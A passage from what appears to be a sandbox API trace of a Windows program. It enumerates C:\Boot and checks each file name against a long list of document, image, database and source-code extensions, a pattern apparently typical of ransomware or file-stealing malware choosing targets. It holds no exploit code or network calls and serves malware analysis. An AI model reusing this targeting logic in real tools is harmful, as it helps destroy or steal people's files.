(lpString1=".bak", lpString2=".LOG") returned -1 [0156.409] lstrlenW (lpString=".bay") returned 4 [0156.409] lstrcmpiW (lpString1=".bay", lpString2=".LOG") returned -1 [0156.409] lstrlenW (lpString=".bd") returned 3 [0156.409] lstrcmpiW (lpString1=".bd", lpString2="LOG") returned -1 [0156.409] lstrlenW (lpString=".bin") returned 4 [0156.409] lstrcmpiW (lpString1=".bin", lpString2=".LOG") returned -1 [0156.409] lstrlenW (lpString=".bmp") returned 4 [0156.409] lstrcmpiW (lpString1=".bmp", lpString2=".LOG") returned -1 [0156.409] lstrlenW (lpString=".bz2") returned 4 [0156.409] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0156.409] lstrlenW (lpString=".c") returned 2 [0156.409] lstrcmpiW (lpString1=".c", lpString2="OG") returned -1 [0156.409] lstrlenW (lpString=".cdr") returned 4 [0156.409] lstrcmpiW (lpString1=".cdr", lpString2=".LOG") returned -1 [0156.409] lstrlenW (lpString=".cer") returned 4 [0156.410] lstrcmpiW (lpString1=".cer", lpString2=".LOG") returned -1 [0156.410] lstrlenW (lpString=".cf") returned 3 [0156.410] lstrcmpiW (lpString1=".cf", lpString2="LOG") returned -1 [0156.410] lstrlenW (lpString=".cfc") returned 4 [0156.410] lstrcmpiW (lpString1=".cfc", lpString2=".LOG") returned -1 [0156.410] lstrlenW (lpString=".cfm") returned 4 [0156.410] lstrcmpiW (lpString1=".cfm", lpString2=".LOG") returned -1 [0156.410] lstrlenW (lpString=".cfml") returned 5 [0156.410] lstrcmpiW (lpString1=".cfml", lpString2="D.LOG") returned -1 [0156.410] lstrlenW (lpString=".cfu") returned 4 [0156.410] lstrcmpiW (lpString1=".cfu", lpString2=".LOG") returned -1 [0156.410] lstrlenW (lpString=".chm") returned 4 [0156.410] lstrcmpiW (lpString1=".chm", lpString2=".LOG") returned -1 [0156.410] lstrlenW (lpString=".cin") returned 4 [0156.410] lstrcmpiW (lpString1=".cin", lpString2=".LOG") returned -1 [0156.410] lstrlenW (lpString=".class") returned 6 [0156.410] lstrcmpiW (lpString1=".class", lpString2="CD.LOG") returned -1 [0156.410] lstrlenW (lpString=".clx") returned 4 [0156.411] lstrcmpiW (lpString1=".clx", lpString2=".LOG") returned -1 [0156.411] lstrlenW (lpString=".config") returned 7 [0156.411] lstrcmpiW (lpString1=".config", lpString2="BCD.LOG") returned -1 [0156.411] lstrlenW (lpString=".cpp") returned 4 [0156.411] lstrcmpiW (lpString1=".cpp", lpString2=".LOG") returned -1 [0156.411] lstrlenW (lpString=".cr2") returned 4 [0156.411] lstrcmpiW (lpString1=".cr2", lpString2=".LOG") returned -1 [0156.411] lstrlenW (lpString=".crt") returned 4 [0156.411] lstrcmpiW (lpString1=".crt", lpString2=".LOG") returned -1 [0156.411] lstrlenW (lpString=".crw") returned 4 [0156.411] lstrcmpiW (lpString1=".crw", lpString2=".LOG") returned -1 [0156.411] lstrlenW (lpString=".cs") returned 3 [0156.411] lstrcmpiW (lpString1=".cs", lpString2="LOG") returned -1 [0156.411] lstrlenW (lpString=".css") returned 4 [0156.411] lstrcmpiW (lpString1=".css", lpString2=".LOG") returned -1 [0156.411] lstrlenW (lpString=".csv") returned 4 [0156.411] lstrcmpiW (lpString1=".csv", lpString2=".LOG") returned -1 [0156.411] lstrlenW (lpString=".cub") returned 4 [0156.412] lstrcmpiW (lpString1=".cub", lpString2=".LOG") returned -1 [0156.412] lstrlenW (lpString=".dae") returned 4 [0156.412] lstrcmpiW (lpString1=".dae", lpString2=".LOG") returned -1 [0156.412] lstrlenW (lpString=".dat") returned 4 [0156.412] lstrcmpiW (lpString1=".dat", lpString2=".LOG") returned -1 [0156.412] lstrlenW (lpString=".db") returned 3 [0156.412] lstrcmpiW (lpString1=".db", lpString2="LOG") returned -1 [0156.412] lstrlenW (lpString=".dbf") returned 4 [0156.412] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0156.412] lstrlenW (lpString=".dbx") returned 4 [0156.412] lstrcmpiW (lpString1=".dbx", lpString2=".LOG") returned -1 [0156.412] lstrlenW (lpString=".dc3") returned 4 [0156.412] lstrcmpiW (lpString1=".dc3", lpString2=".LOG") returned -1 [0156.412] lstrlenW (lpString=".dcm") returned 4 [0156.412] lstrcmpiW (lpString1=".dcm", lpString2=".LOG") returned -1 [0156.412] lstrlenW (lpString=".dcr") returned 4 [0156.412] lstrcmpiW (lpString1=".dcr", lpString2=".LOG") returned -1 [0156.413] lstrlenW (lpString=".der") returned 4 [0156.413] lstrcmpiW (lpString1=".der", lpString2=".LOG") returned -1 [0156.413] lstrlenW (lpString=".dib") returned 4 [0156.413] lstrcmpiW (lpString1=".dib", lpString2=".LOG") returned -1 [0156.413] lstrlenW (lpString=".dic") returned 4 [0156.413] lstrcmpiW (lpString1=".dic", lpString2=".LOG") returned -1 [0156.413] lstrlenW (lpString=".dif") returned 4 [0156.413] lstrcmpiW (lpString1=".dif", lpString2=".LOG") returned -1 [0156.416] lstrlenW (lpString=".divx") returned 5 [0156.416] lstrcmpiW (lpString1=".divx", lpString2="D.LOG") returned -1 [0156.416] lstrlenW (lpString=".djvu") returned 5 [0156.416] lstrcmpiW (lpString1=".djvu", lpString2="D.LOG") returned -1 [0156.416] lstrlenW (lpString=".dng") returned 4 [0156.416] lstrcmpiW (lpString1=".dng", lpString2=".LOG") returned -1 [0156.416] lstrlenW (lpString=".doc") returned 4 [0156.416] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0156.416] lstrlenW (lpString=".docm") returned 5 [0156.416] lstrcmpiW (lpString1=".docm", lpString2="D.LOG") returned -1 [0156.416] lstrlenW (lpString=".docx") returned 5 [0156.416] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0156.416] lstrlenW (lpString=".dot") returned 4 [0156.417] lstrcmpiW (lpString1=".dot", lpString2=".LOG") returned -1 [0156.417] lstrlenW (lpString=".dotm") returned 5 [0156.417] lstrcmpiW (lpString1=".dotm", lpString2="D.LOG") returned -1 [0156.417] lstrlenW (lpString=".dotx") returned 5 [0156.417] lstrcmpiW (lpString1=".dotx", lpString2="D.LOG") returned -1 [0156.417] lstrlenW (lpString=".dpx") returned 4 [0156.417] lstrcmpiW (lpString1=".dpx", lpString2=".LOG") returned -1 [0156.417] lstrlenW (lpString=".dqy") returned 4 [0156.417] lstrcmpiW (lpString1=".dqy", lpString2=".LOG") returned -1 [0156.417] lstrlenW (lpString=".dsn") returned 4 [0156.417] lstrcmpiW (lpString1=".dsn", lpString2=".LOG") returned -1 [0156.418] lstrlenW (lpString=".dt") returned 3 [0156.418] lstrcmpiW (lpString1=".dt", lpString2="LOG") returned -1 [0156.418] lstrlenW (lpString=".dtd") returned 4 [0156.418] lstrcmpiW (lpString1=".dtd", lpString2=".LOG") returned -1 [0156.418] lstrlenW (lpString=".dwg") returned 4 [0156.418] lstrcmpiW (lpString1=".dwg", lpString2=".LOG") returned -1 [0156.418] lstrlenW (lpString=".dwt") returned 4 [0156.418] lstrcmpiW (lpString1=".dwt", lpString2=".LOG") returned -1 [0156.418] lstrlenW (lpString=".dx") returned 3 [0156.418] lstrcmpiW (lpString1=".dx", lpString2="LOG") returned -1 [0156.418] lstrlenW (lpString=".dxf") returned 4 [0156.418] lstrcmpiW (lpString1=".dxf", lpString2=".LOG") returned -1 [0156.418] lstrlenW (lpString=".edml") returned 5 [0156.418] lstrcmpiW (lpString1=".edml", lpString2="D.LOG") returned -1 [0156.419] lstrlenW (lpString=".efd") returned 4 [0156.419] lstrcmpiW (lpString1=".efd", lpString2=".LOG") returned -1 [0156.419] lstrlenW (lpString=".elf") returned 4 [0156.419] lstrcmpiW (lpString1=".elf", lpString2=".LOG") returned -1 [0156.419] lstrlenW (lpString=".emf") returned 4 [0156.419] lstrcmpiW (lpString1=".emf", lpString2=".LOG") returned -1 [0156.419] lstrlenW (lpString=".emz") returned 4 [0156.419] lstrcmpiW (lpString1=".emz", lpString2=".LOG") returned -1 [0156.419] lstrlenW (lpString=".epf") returned 4 [0156.419] lstrcmpiW (lpString1=".epf", lpString2=".LOG") returned -1 [0156.419] lstrlenW (lpString=".eps") returned 4 [0156.419] lstrcmpiW (lpString1=".eps", lpString2=".LOG") returned -1 [0156.419] lstrlenW (lpString=".epsf") returned 5 [0156.419] lstrcmpiW (lpString1=".epsf", lpString2="D.LOG") returned -1 [0156.419] lstrlenW (lpString=".epsp") returned 5 [0156.419] lstrcmpiW (lpString1=".epsp", lpString2="D.LOG") returned -1 [0156.419] lstrlenW (lpString=".erf") returned 4 [0156.419] lstrcmpiW (lpString1=".erf", lpString2=".LOG") returned -1 [0156.420] lstrlenW (lpString=".exr") returned 4 [0156.420] lstrcmpiW (lpString1=".exr", lpString2=".LOG") returned -1 [0156.420] lstrlenW (lpString=".f4v") returned 4 [0156.420] lstrcmpiW (lpString1=".f4v", lpString2=".LOG") returned -1 [0156.420] lstrlenW (lpString=".fido") returned 5 [0156.420] lstrcmpiW (lpString1=".fido", lpString2="D.LOG") returned -1 [0156.420] lstrlenW (lpString=".flm") returned 4 [0156.420] lstrcmpiW (lpString1=".flm", lpString2=".LOG") returned -1 [0156.420] lstrlenW (lpString=".flv") returned 4 [0156.420] lstrcmpiW (lpString1=".flv", lpString2=".LOG") returned -1 [0156.420] lstrlenW (lpString=".frm") returned 4 [0156.420] lstrcmpiW (lpString1=".frm", lpString2=".LOG") returned -1 [0156.420] lstrlenW (lpString=".fxg") returned 4 [0156.420] lstrcmpiW (lpString1=".fxg", lpString2=".LOG") returned -1 [0156.420] lstrlenW (lpString=".geo") returned 4 [0156.420] lstrcmpiW (lpString1=".geo", lpString2=".LOG") returned -1 [0156.420] lstrlenW (lpString=".gif") returned 4 [0156.421] lstrcmpiW (lpString1=".gif", lpString2=".LOG") returned -1 [0156.421] lstrlenW (lpString=".grs") returned 4 [0156.421] lstrcmpiW (lpString1=".grs", lpString2=".LOG") returned -1 [0156.421] lstrlenW (lpString=".gz") returned 3 [0156.421] lstrcmpiW (lpString1=".gz", lpString2="LOG") returned -1 [0156.421] lstrlenW (lpString=".h") returned 2 [0156.421] lstrcmpiW (lpString1=".h", lpString2="OG") returned -1 [0156.421] lstrlenW (lpString=".hdr") returned 4 [0156.421] lstrcmpiW (lpString1=".hdr", lpString2=".LOG") returned -1 [0156.421] lstrlenW (lpString=".hpp") returned 4 [0156.421] lstrcmpiW (lpString1=".hpp", lpString2=".LOG") returned -1 [0156.421] lstrlenW (lpString=".hta") returned 4 [0156.421] lstrcmpiW (lpString1=".hta", lpString2=".LOG") returned -1 [0156.421] lstrlenW (lpString=".htc") returned 4 [0156.421] lstrcmpiW (lpString1=".htc", lpString2=".LOG") returned -1 [0156.421] lstrlenW (lpString=".htm") returned 4 [0156.421] lstrcmpiW (lpString1=".htm", lpString2=".LOG") returned -1 [0156.421] lstrlenW (lpString=".html") returned 5 [0156.422] lstrcmpiW (lpString1=".html", lpString2="D.LOG") returned -1 [0156.422] lstrlenW (lpString=".icb") returned 4 [0156.422] lstrcmpiW (lpString1=".icb", lpString2=".LOG") returned -1 [0156.422] lstrlenW (lpString=".ics") returned 4 [0156.422] lstrcmpiW (lpString1=".ics", lpString2=".LOG") returned -1 [0156.422] lstrlenW (lpString=".iff") returned 4 [0156.422] lstrcmpiW (lpString1=".iff", lpString2=".LOG") returned -1 [0156.422] lstrlenW (lpString=".inc") returned 4 [0156.422] lstrcmpiW (lpString1=".inc", lpString2=".LOG") returned -1 [0156.422] lstrlenW (lpString=".indd") returned 5 [0156.422] lstrcmpiW (lpString1=".indd", lpString2="D.LOG") returned -1 [0156.422] lstrlenW (lpString=".ini") returned 4 [0156.422] lstrcmpiW (lpString1=".ini", lpString2=".LOG") returned -1 [0156.422] lstrlenW (lpString=".iqy") returned 4 [0156.422] lstrcmpiW (lpString1=".iqy", lpString2=".LOG") returned -1 [0156.422] lstrlenW (lpString=".j2c") returned 4 [0156.422] lstrcmpiW (lpString1=".j2c", lpString2=".LOG") returned -1 [0156.422] lstrlenW (lpString=".j2k") returned 4 [0156.422] lstrcmpiW (lpString1=".j2k", lpString2=".LOG") returned -1 [0156.423] lstrlenW (lpString=".java") returned 5 [0156.423] lstrcmpiW (lpString1=".java", lpString2="D.LOG") returned -1 [0156.423] lstrlenW (lpString=".jp2") returned 4 [0156.423] lstrcmpiW (lpString1=".jp2", lpString2=".LOG") returned -1 [0156.423] lstrlenW (lpString=".jpc") returned 4 [0156.423] lstrcmpiW (lpString1=".jpc", lpString2=".LOG") returned -1 [0156.423] lstrlenW (lpString=".jpe") returned 4 [0156.423] lstrcmpiW (lpString1=".jpe", lpString2=".LOG") returned -1 [0156.423] lstrlenW (lpString=".jpeg") returned 5 [0156.423] lstrcmpiW (lpString1=".jpeg", lpString2="D.LOG") returned -1 [0156.423] lstrlenW (lpString=".jpf") returned 4 [0156.423] lstrcmpiW (lpString1=".jpf", lpString2=".LOG") returned -1 [0156.423] lstrlenW (lpString=".jpg") returned 4 [0156.423] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0156.423] lstrlenW (lpString=".jpx") returned 4 [0156.423] lstrcmpiW (lpString1=".jpx", lpString2=".LOG") returned -1 [0156.423] lstrlenW (lpString=".js") returned 3 [0156.423] lstrcmpiW (lpString1=".js", lpString2="LOG") returned -1 [0156.424] lstrlenW (lpString=".jsf") returned 4 [0156.424] lstrcmpiW (lpString1=".jsf", lpString2=".LOG") returned -1 [0156.424] lstrlenW (lpString=".json") returned 5 [0156.424] lstrcmpiW (lpString1=".json", lpString2="D.LOG") returned -1 [0156.424] lstrlenW (lpString=".jsp") returned 4 [0156.424] lstrcmpiW (lpString1=".jsp", lpString2=".LOG") returned -1 [0156.424] lstrlenW (lpString=".kdc") returned 4 [0156.424] lstrcmpiW (lpString1=".kdc", lpString2=".LOG") returned -1 [0156.424] lstrlenW (lpString=".kmz") returned 4 [0156.424] lstrcmpiW (lpString1=".kmz", lpString2=".LOG") returned -1 [0156.424] lstrlenW (lpString=".kwm") returned 4 [0156.424] lstrcmpiW (lpString1=".kwm", lpString2=".LOG") returned -1 [0156.424] lstrlenW (lpString=".lasso") returned 6 [0156.424] lstrcmpiW (lpString1=".lasso", lpString2="CD.LOG") returned -1 [0156.424] lstrlenW (lpString=".lbi") returned 4 [0156.424] lstrcmpiW (lpString1=".lbi", lpString2=".LOG") returned -1 [0156.424] lstrlenW (lpString=".lgf") returned 4 [0156.425] lstrcmpiW (lpString1=".lgf", lpString2=".LOG") returned -1 [0156.425] lstrlenW (lpString=".lgp") returned 4 [0156.425] lstrcmpiW (lpString1=".lgp", lpString2=".LOG") returned -1 [0156.425] lstrlenW (lpString=".log") returned 4 [0156.425] lstrcmpiW (lpString1=".log", lpString2=".LOG") returned 0 [0156.425] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0156.425] lstrlenW (lpString="BCD.LOG1") returned 8 [0156.425] lstrlenW (lpString=".1cd") returned 4 [0156.425] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0156.425] lstrlenW (lpString=".3ds") returned 4 [0156.425] lstrcmpiW (lpString1=".3ds", lpString2="LOG1") returned -1 [0156.425] lstrlenW (lpString=".3fr") returned 4 [0156.425] lstrcmpiW (lpString1=".3fr", lpString2="LOG1") returned -1 [0156.425] lstrlenW (lpString=".3g2") returned 4 [0156.425] lstrcmpiW (lpString1=".3g2", lpString2="LOG1") returned -1 [0156.425] lstrlenW (lpString=".3gp") returned 4 [0156.425] lstrcmpiW (lpString1=".3gp", lpString2="LOG1") returned -1 [0156.426] lstrlenW (lpString=".7z") returned 3 [0156.426] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0156.426] lstrlenW (lpString=".accda") returned 6 [0156.426] lstrcmpiW (lpString1=".accda", lpString2="D.LOG1") returned -1 [0156.426] lstrlenW (lpString=".accdb") returned 6 [0156.426] lstrcmpiW (lpString1=".accdb", lpString2="D.LOG1") returned -1 [0156.426] lstrlenW (lpString=".accdc") returned 6 [0156.426] lstrcmpiW (lpString1=".accdc", lpString2="D.LOG1") returned -1 [0156.426] lstrlenW (lpString=".accde") returned 6 [0156.426] lstrcmpiW (lpString1=".accde", lpString2="D.LOG1") returned -1 [0156.426] lstrlenW (lpString=".accdt") returned 6 [0156.426] lstrcmpiW (lpString1=".accdt", lpString2="D.LOG1") returned -1 [0156.426] lstrlenW (lpString=".accdw") returned 6 [0156.426] lstrcmpiW (lpString1=".accdw", lpString2="D.LOG1") returned -1 [0156.426] lstrlenW (lpString=".adb") returned 4 [0156.426] lstrcmpiW (lpString1=".adb", lpString2="LOG1") returned -1 [0156.426] lstrlenW (lpString=".adp") returned 4 [0156.426] lstrcmpiW (lpString1=".adp", lpString2="LOG1") returned -1 [0156.427] lstrlenW (lpString=".ai") returned 3 [0156.427] lstrcmpiW (lpString1=".ai", lpString2="OG1") returned -1 [0156.427] lstrlenW (lpString=".ai3") returned 4 [0156.427] lstrcmpiW (lpString1=".ai3", lpString2="LOG1") returned -1 [0156.427] lstrlenW (lpString=".ai4") returned 4 [0156.427] lstrcmpiW (lpString1=".ai4", lpString2="LOG1") returned -1 [0156.427] lstrlenW (lpString=".ai5") returned 4 [0156.427] lstrcmpiW (lpString1=".ai5", lpString2="LOG1") returned -1 [0156.427] lstrlenW (lpString=".ai6") returned 4 [0156.427] lstrcmpiW (lpString1=".ai6", lpString2="LOG1") returned -1 [0156.427] lstrlenW (lpString=".ai7") returned 4 [0156.427] lstrcmpiW (lpString1=".ai7", lpString2="LOG1") returned -1 [0156.427] lstrlenW (lpString=".ai8") returned 4 [0156.427] lstrcmpiW (lpString1=".ai8", lpString2="LOG1") returned -1 [0156.427] lstrlenW (lpString=".anim") returned 5 [0156.427] lstrcmpiW (lpString1=".anim", lpString2=".LOG1") returned -1 [0156.428] lstrlenW (lpString=".arw") returned 4 [0156.428] lstrcmpiW (lpString1=".arw", lpString2="LOG1") returned -1 [0156.428] lstrlenW (lpString=".as") returned 3 [0156.428] lstrcmpiW (lpString1=".as", lpString2="OG1") returned -1 [0156.428] lstrlenW (lpString=".asa") returned 4 [0156.428] lstrcmpiW (lpString1=".asa", lpString2="LOG1") returned -1 [0156.428] lstrlenW (lpString=".asc") returned 4 [0156.428] lstrcmpiW (lpString1=".asc", lpString2="LOG1") returned -1 [0156.428] lstrlenW (lpString=".ascx") returned 5 [0156.428] lstrcmpiW (lpString1=".ascx", lpString2=".LOG1") returned -1 [0156.428] lstrlenW (lpString=".asm") returned 4 [0156.428] lstrcmpiW (lpString1=".asm", lpString2="LOG1") returned -1 [0156.428] lstrlenW (lpString=".asmx") returned 5 [0156.428] lstrcmpiW (lpString1=".asmx", lpString2=".LOG1") returned -1 [0156.428] lstrlenW (lpString=".asp") returned 4 [0156.428] lstrcmpiW (lpString1=".asp", lpString2="LOG1") returned -1 [0156.428] lstrlenW (lpString=".aspx") returned 5 [0156.428] lstrcmpiW (lpString1=".aspx", lpString2=".LOG1") returned -1 [0156.429] lstrlenW (lpString=".asr") returned 4 [0156.429] lstrcmpiW (lpString1=".asr", lpString2="LOG1") returned -1 [0156.429] lstrlenW (lpString=".asx") returned 4 [0156.429] lstrcmpiW (lpString1=".asx", lpString2="LOG1") returned -1 [0156.429] lstrlenW (lpString=".avi") returned 4 [0156.429] lstrcmpiW (lpString1=".avi", lpString2="LOG1") returned -1 [0156.429] lstrlenW (lpString=".avs") returned 4 [0156.429] lstrcmpiW (lpString1=".avs", lpString2="LOG1") returned -1 [0156.429] lstrlenW (lpString=".backup") returned 7 [0156.429] lstrcmpiW (lpString1=".backup", lpString2="CD.LOG1") returned -1 [0156.429] lstrlenW (lpString=".bak") returned 4 [0156.430] lstrcmpiW (lpString1=".bak", lpString2="LOG1") returned -1 [0156.430] lstrlenW (lpString=".bay") returned 4 [0156.430] lstrcmpiW (lpString1=".bay", lpString2="LOG1") returned -1 [0156.430] lstrlenW (lpString=".bd") returned 3 [0156.430] lstrcmpiW (lpString1=".bd", lpString2="OG1") returned -1 [0156.430] lstrlenW (lpString=".bin") returned 4 [0156.430] lstrcmpiW (lpString1=".bin", lpString2="LOG1") returned -1 [0156.430] lstrlenW (lpString=".bmp") returned 4 [0156.430] lstrcmpiW (lpString1=".bmp", lpString2="LOG1") returned -1 [0156.430] lstrlenW (lpString=".bz2") returned 4 [0156.430] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0156.430] lstrlenW (lpString=".c") returned 2 [0156.430] lstrcmpiW (lpString1=".c", lpString2="G1") returned -1 [0156.430] lstrlenW (lpString=".cdr") returned 4 [0156.430] lstrcmpiW (lpString1=".cdr", lpString2="LOG1") returned -1 [0156.430] lstrlenW (lpString=".cer") returned 4 [0156.430] lstrcmpiW (lpString1=".cer", lpString2="LOG1") returned -1 [0156.431] lstrlenW (lpString=".cf") returned 3 [0156.431] lstrcmpiW (lpString1=".cf", lpString2="OG1") returned -1 [0156.431] lstrlenW (lpString=".cfc") returned 4 [0156.431] lstrcmpiW (lpString1=".cfc", lpString2="LOG1") returned -1 [0156.431] lstrlenW (lpString=".cfm") returned 4 [0156.431] lstrcmpiW (lpString1=".cfm", lpString2="LOG1") returned -1 [0156.431] lstrlenW (lpString=".cfml") returned 5 [0156.431] lstrcmpiW (lpString1=".cfml", lpString2=".LOG1") returned -1 [0156.431] lstrlenW (lpString=".cfu") returned 4 [0156.431] lstrcmpiW (lpString1=".cfu", lpString2="LOG1") returned -1 [0156.431] lstrlenW (lpString=".chm") returned 4 [0156.431] lstrcmpiW (lpString1=".chm", lpString2="LOG1") returned -1 [0156.431] lstrlenW (lpString=".cin") returned 4 [0156.431] lstrcmpiW (lpString1=".cin", lpString2="LOG1") returned -1 [0156.431] lstrlenW (lpString=".class") returned 6 [0156.431] lstrcmpiW (lpString1=".class", lpString2="D.LOG1") returned -1 [0156.431] lstrlenW (lpString=".clx") returned 4 [0156.431] lstrcmpiW (lpString1=".clx", lpString2="LOG1") returned -1 [0156.432] lstrlenW (lpString=".config") returned 7 [0156.432] lstrcmpiW (lpString1=".config", lpString2="CD.LOG1") returned -1 [0156.432] lstrlenW (lpString=".cpp") returned 4 [0156.432] lstrcmpiW (lpString1=".cpp", lpString2="LOG1") returned -1 [0156.432] lstrlenW (lpString=".cr2") returned 4 [0156.432] lstrcmpiW (lpString1=".cr2", lpString2="LOG1") returned -1 [0156.432] lstrlenW (lpString=".crt") returned 4 [0156.432] lstrcmpiW (lpString1=".crt", lpString2="LOG1") returned -1 [0156.432] lstrlenW (lpString=".crw") returned 4 [0156.432] lstrcmpiW (lpString1=".crw", lpString2="LOG1") returned -1 [0156.432] lstrlenW (lpString=".cs") returned 3 [0156.432] lstrcmpiW (lpString1=".cs", lpString2="OG1") returned -1 [0156.432] lstrlenW (lpString=".css") returned 4 [0156.432] lstrcmpiW (lpString1=".css", lpString2="LOG1") returned -1 [0156.432] lstrlenW (lpString=".csv") returned 4 [0156.432] lstrcmpiW (lpString1=".csv", lpString2="LOG1") returned -1 [0156.432] lstrlenW (lpString=".cub") returned 4 [0156.432] lstrcmpiW (lpString1=".cub", lpString2="LOG1") returned -1 [0156.433] lstrlenW (lpString=".dae") returned 4 [0156.433] lstrcmpiW (lpString1=".dae", lpString2="LOG1") returned -1 [0156.433] lstrlenW (lpString=".dat") returned 4 [0156.433] lstrcmpiW (lpString1=".dat", lpString2="LOG1") returned -1 [0156.433] lstrlenW (lpString=".db") returned 3 [0156.433] lstrcmpiW (lpString1=".db", lpString2="OG1") returned -1 [0156.433] lstrlenW (lpString=".dbf") returned 4 [0156.433] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0156.433] lstrlenW (lpString=".dbx") returned 4 [0156.433] lstrcmpiW (lpString1=".dbx", lpString2="LOG1") returned -1 [0156.433] lstrlenW (lpString=".dc3") returned 4 [0156.433] lstrcmpiW (lpString1=".dc3", lpString2="LOG1") returned -1 [0156.433] lstrlenW (lpString=".dcm") returned 4 [0156.433] lstrcmpiW (lpString1=".dcm", lpString2="LOG1") returned -1 [0156.433] lstrlenW (lpString=".dcr") returned 4 [0156.433] lstrcmpiW (lpString1=".dcr", lpString2="LOG1") returned -1 [0156.433] lstrlenW (lpString=".der") returned 4 [0156.433] lstrcmpiW (lpString1=".der", lpString2="LOG1") returned -1 [0156.434] lstrlenW (lpString=".dib") returned 4 [0156.434] lstrcmpiW (lpString1=".dib", lpString2="LOG1") returned -1 [0156.434] lstrlenW (lpString=".dic") returned 4 [0156.434] lstrcmpiW (lpString1=".dic", lpString2="LOG1") returned -1 [0156.434] lstrlenW (lpString=".dif") returned 4 [0156.434] lstrcmpiW (lpString1=".dif", lpString2="LOG1") returned -1 [0156.434] lstrlenW (lpString=".divx") returned 5 [0156.434] lstrcmpiW (lpString1=".divx", lpString2=".LOG1") returned -1 [0156.434] lstrlenW (lpString=".djvu") returned 5 [0156.434] lstrcmpiW (lpString1=".djvu", lpString2=".LOG1") returned -1 [0156.434] lstrlenW (lpString=".dng") returned 4 [0156.434] lstrcmpiW (lpString1=".dng", lpString2="LOG1") returned -1 [0156.434] lstrlenW (lpString=".doc") returned 4 [0156.434] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0156.434] lstrlenW (lpString=".docm") returned 5 [0156.434] lstrcmpiW (lpString1=".docm", lpString2=".LOG1") returned -1 [0156.434] lstrlenW (lpString=".docx") returned 5 [0156.434] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0156.434] lstrlenW (lpString=".dot") returned 4 [0156.435] lstrcmpiW (lpString1=".dot", lpString2="LOG1") returned -1 [0156.435] lstrlenW (lpString=".dotm") returned 5 [0156.435] lstrcmpiW (lpString1=".dotm", lpString2=".LOG1") returned -1 [0156.435] lstrlenW (lpString=".dotx") returned 5 [0156.435] lstrcmpiW (lpString1=".dotx", lpString2=".LOG1") returned -1 [0156.435] lstrlenW (lpString=".dpx") returned 4 [0156.435] lstrcmpiW (lpString1=".dpx", lpString2="LOG1") returned -1 [0156.435] lstrlenW (lpString=".dqy") returned 4 [0156.435] lstrcmpiW (lpString1=".dqy", lpString2="LOG1") returned -1 [0156.435] lstrlenW (lpString=".dsn") returned 4 [0156.435] lstrcmpiW (lpString1=".dsn", lpString2="LOG1") returned -1 [0156.435] lstrlenW (lpString=".dt") returned 3 [0156.435] lstrcmpiW (lpString1=".dt", lpString2="OG1") returned -1 [0156.435] lstrlenW (lpString=".dtd") returned 4 [0156.435] lstrcmpiW (lpString1=".dtd", lpString2="LOG1") returned -1 [0156.435] lstrlenW (lpString=".dwg") returned 4 [0156.435] lstrcmpiW (lpString1=".dwg", lpString2="LOG1") returned -1 [0156.436] lstrlenW (lpString=".dwt") returned 4 [0156.436] lstrcmpiW (lpString1=".dwt", lpString2="LOG1") returned -1 [0156.436] lstrlenW (lpString=".dx") returned 3 [0156.436] lstrcmpiW (lpString1=".dx", lpString2="OG1") returned -1 [0156.436] lstrlenW (lpString=".dxf") returned 4 [0156.436] lstrcmpiW (lpString1=".dxf", lpString2="LOG1") returned -1 [0156.436] lstrlenW (lpString=".edml") returned 5 [0156.436] lstrcmpiW (lpString1=".edml", lpString2=".LOG1") returned -1 [0156.436] lstrlenW (lpString=".efd") returned 4 [0156.436] lstrcmpiW (lpString1=".efd", lpString2="LOG1") returned -1 [0156.436] lstrlenW (lpString=".elf") returned 4 [0156.436] lstrcmpiW (lpString1=".elf", lpString2="LOG1") returned -1 [0156.436] lstrlenW (lpString=".emf") returned 4 [0156.436] lstrcmpiW (lpString1=".emf", lpString2="LOG1") returned -1 [0156.436] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0156.437] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0156.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0156.437] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*", lpFindFileData=0x34ff800 | out: 